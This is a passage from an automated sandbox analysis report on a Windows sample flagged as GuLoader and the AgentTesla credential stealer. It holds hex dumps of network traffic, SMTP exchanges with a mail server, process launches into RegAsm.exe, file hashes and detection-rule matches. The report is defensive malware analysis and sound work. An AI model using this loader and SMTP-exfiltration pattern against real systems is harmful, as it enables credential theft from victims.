                                                                      2021-10-13 16:06:31 UTC220INData Raw: 59 78 3c dd b6 aa 7d c5 5f 10 ef 3e 5d f1 9b ef 51 07 7e f1 7a f6 1e 5d 04 00 4c 78 0a dd 26 9b 66 d3 61 6c 2b ac 8c cd 01 fe 83 77 d3 21 4d 45 1e 44 32 de a2 55 b1 4b 70 83 d3 40 52 40 5d 08 a9 83 b9 4a d3 f0 43 39 24 fb 93 e3 8f e0 c9 4c 42 88 f5 1d ed 87 20 b5 bf c3 bf 1e 65 b1 80 d6 80 62 1e ed e2 cc 14 b4 3b 84 38 87 64 60 8d ff 34 b8 ef c9 ba 22 3b c8 09 24 eb 8b 81 84 ba 88 6d 58 3a ef 0f 0d b3 06 1e d3 58 d5 63 97 39 2a 96 e0 3e a6 ff 44 d1 c0 ab c7 65 f4 69 58 71 79 e0 f3 68 36 b0 8f 64 8f 7f b9 6f 83 be 6d ac ac 62 11 2d 87 fc 6c 29 3d 7a ef 50 e5 78 44 f2 c9 99 9c 08 91 f5 4b 56 23 95 3f 16 42 e4 5f 18 d6 ff ba ca a2 4a c4 f9 c9 f6 e3 7b da ad 00 af ee 47 61 4d 9c f4 60 6b 16 d5 87 ca 5d d7 69 76 d7 ab 19 73 dd 78 36 ea 3b 14 74 e1 52 b0 1e 2b
                                                                      Data Ascii: Yx<}_>]Q~z]Lx&fal+w!MED2UKp@R@]JC9$LB eb;8d`4";$mX:Xc9*>DeiXqyh6domb-l)=zPxDKV#?B_J{GaM`k]ivsx6;tR+
                                                                      2021-10-13 16:06:31 UTC221INData Raw: d1 6d ac 8b aa d2 a2 0f 38 29 ef c7 0c 8b d5 0e 1a c9 fe 4d 3a d1 10 a3 2c db 92 81 b0 f9 e2 9a 0f d4 05 cf ca f2 ea 63 44 32 3d 11 ad 6f 9a 4a ef c0 ad da 3c 12 68 69 73 c5 fa b2 b3 c0 14 51 97 5f 86 76 ed ab 02 de 8c ef 9c 22 1c 58 07 20 cd ea db 2b d0 bd ad 57 34 f9 62 a5 ce 11 b9 77 2b 39 22 0d 8b d8 ee c2 0b 04 75 26 9d d7 f1 0d 60 cc 51 dc ed 96 dd bd 6a ac 16 16 6e be 23 39 76 1c 51 f3 a9 22 9d 09 5b f9 12 cd 76 27 a8 99 70 57 83 28 5d 56 1e 72 e3 bc c5 8f b0 b5 1c 0e d3 67 c9 c9 9d d8 84 c8 91 ac a5 f0 be 36 bb 33 e2 7c d2 c1 0f 06 ee a3 89 e9 20 14 70 56 24 60 0d 84 4a 43 36 8f bd 98 0a bd 26 0a 55 e0 c9 e2 17 ab 81 5d c6 a5 58 77 c8 9e a1 dc 4d b4 da 90 c1 49 28 8f 43 50 5f bc 92 5f d4 da f0 3e 9f 1e c0 5e 89 ff 55 d1 60 f2 65 ae 02 77 b7 f8 10
                                                                      Data Ascii: m8)M:,cD2=oJ<hisQ_v"X +W4bw+9"u&`Qjn#9vQ"[v'pW(]Vrg63| pV$`JC6&U]XwMI(CP__>^U`ew


                                                                      SMTP Packets

                                                                      TimestampSource PortDest PortSource IPDest IPCommands
                                                                      Oct 13, 2021 18:08:13.695318937 CEST58749807188.93.227.195192.168.11.20220-iberweb-11a.ibername.com ESMTP Exim 4.94.2 #2 Wed, 13 Oct 2021 17:08:11 +0100
                                                                      220-We do not authorize the use of this system to transport unsolicited,
                                                                      220 and/or bulk e-mail.
                                                                      Oct 13, 2021 18:08:13.695945978 CEST49807587192.168.11.20188.93.227.195EHLO 210979
                                                                      Oct 13, 2021 18:08:13.747463942 CEST58749807188.93.227.195192.168.11.20250-iberweb-11a.ibername.com Hello 210979 [102.129.143.96]
                                                                      250-SIZE 52428800
                                                                      250-8BITMIME
                                                                      250-PIPELINING
                                                                      250-PIPE_CONNECT
                                                                      250-AUTH PLAIN LOGIN
                                                                      250-STARTTLS
                                                                      250 HELP
                                                                      Oct 13, 2021 18:08:13.747915983 CEST49807587192.168.11.20188.93.227.195STARTTLS
                                                                      Oct 13, 2021 18:08:13.801871061 CEST58749807188.93.227.195192.168.11.20220 TLS go ahead

                                                                      Code Manipulations

                                                                      Statistics

                                                                      Behavior

                                                                      Click to jump to process

                                                                      System Behavior

                                                                      General

                                                                      Start time:18:05:35
                                                                      Start date:13/10/2021
                                                                      Path:C:\Users\user\Desktop\ZAM#U00d3WIENIE.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:'C:\Users\user\Desktop\ZAM#U00d3WIENIE.exe'
                                                                      Imagebase:0x400000
                                                                      File size:98304 bytes
                                                                      MD5 hash:4805BFC9145D8AA3AC43D1CC29C451ED
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:Visual Basic
                                                                      Yara matches:
                                                                      • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000001.00000002.25720716372.00000000022C0000.00000040.00000001.sdmp, Author: Joe Security
                                                                      Reputation:low

                                                                      General

                                                                      Start time:18:06:03
                                                                      Start date:13/10/2021
                                                                      Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:'C:\Users\user\Desktop\ZAM#U00d3WIENIE.exe'
                                                                      Imagebase:0x650000
                                                                      File size:65440 bytes
                                                                      MD5 hash:0D5DF43AF2916F47D00C1573797C1A13
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:.Net C# or VB.NET
                                                                      Yara matches:
                                                                      • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000B.00000002.30197411061.000000001DC8B000.00000004.00000001.sdmp, Author: Joe Security
                                                                      • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000B.00000002.30196753558.000000001DC01000.00000004.00000001.sdmp, Author: Joe Security
                                                                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000B.00000002.30196753558.000000001DC01000.00000004.00000001.sdmp, Author: Joe Security
                                                                      Reputation:moderate

                                                                      General

                                                                      Start time:18:06:03
                                                                      Start date:13/10/2021
                                                                      Path:C:\Windows\System32\conhost.exe
                                                                      Wow64 process (32bit):false
                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                      Imagebase:0x7ff686fd0000
                                                                      File size:875008 bytes
                                                                      MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Reputation:moderate

                                                                      Disassembly

                                                                      Code Analysis

                                                                      Reset < >